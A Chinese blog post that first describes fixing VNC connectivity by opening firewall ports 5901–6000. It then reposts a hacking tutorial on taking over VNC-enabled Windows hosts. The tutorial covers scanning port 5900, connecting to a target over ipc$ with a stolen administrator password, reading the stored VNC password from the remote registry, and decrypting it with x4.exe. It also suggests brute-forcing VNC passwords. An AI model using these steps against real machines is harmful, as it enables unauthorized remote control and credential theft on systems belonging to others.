今天通过VNC 图形界面连接在越南的一台机器 ,发现出现连接不了的错误信息。后来通过dameware 软件远程连接到那边的一台windows机器然后vnc 倒是可以,怀疑是为了安全考虑,没有开启vnc 相关端口,后来请网络管理人员查看,果然只是开通了ftp , ssh .... 等几个常用服务。于是查找vnc 默认端口,发现是 5800和 5900 ,由于一般都需要适用 ip:1 或 ip:2 端口登入linux 系统, 故需要开通 5801, 5802 或这 5901 ,5902 (即在默认端口后加上登入时候的port号), 但是管理员开通 5801 到 6000 了,结果还是不行,后来开通 5901 ~6000 , 发现OK . 搞不懂默认端口为 5800 和 5900 为什么 5801~6000开通都不行 。
[@more@]参考资料:
--------------------------------------------------------------
首先把5900端口加进你常用的扫描器.
nt服务器的远程管理(所谓hack,就是去远程管理嘛),基于GUI的通常是win的终端连接(3389),pcanywhere(5631),还有就是vnc(5900),让我们来熟悉一下它.
VNC——Virtual Network
Computing(即虚拟网络计算机系统)是由AT&T开发的各种操作系统之间的相互操作管理系统,使用VNC可以使你在不同的计算机之间实现真正的相互操作,不过,VNC只限于GUI之间的相互操作,如Windows同Linux系统的X
Window之间相互操作,Windows同Macintosh之间的相互操作等,它可以安装在Windows中而让使用者在远端遥控自己的电脑,就算是遥控不同的操作平台也没有问题.
如果你使用的Linux系统,甚至可以用浏览器控制开了VNC服务的机器,如果你是用的win系统,你需要一个VNC的客户端连接器vncviewer.exe.
然而VNC的认证特别简单,它只通过简单的口令认证即允许用户全权操作远端的计算机,更可怕的是,VNC的密码就存储在注册表里,读出Registry的值后经过简单的解密,就能让VNC的密码显原形.一个叫Phenoelit的外国人写了一个解密程序x4.exe
现在来举个例子:我拿到了209.61.*.*的管理员administator的密码是7nt,它开了VNC服务(5900端口),现在开始:
1)net use 209.61.*.*ipc$Content$nbsp;"7nt" /user:"administrator"
先和它做ipc$连接.(如果它没有开ipc$,你可以上传一个reg.exe去读它的Registry的值)
2)打开你的注册表,连接网络注册表(209.61.*.*),通常VNC的密码是在:HKEY_CURRENT_USERSoftwareORLWinVNC3Password
读出他的值是:f1 ad 32 63 f5 ed 3e d7
3)在cmd下运行x4.exe,输入x4.exe
-W回车,注意W要大写,然后输一个值回一次车,直到输完8个值,看看密码出来了:7ntok
4)用vncviewer.exe连过去看看吧,哈.
如果你还没有拿到对方管理员密码,也还有些软件可以挂字典暴破VNC的密码,速度还行,象scanarator,不过一般VNC的密码都较复杂,至少又多了一种攻破系统的方法和希望吧.
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/35489/viewspace-999739/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/35489/viewspace-999739/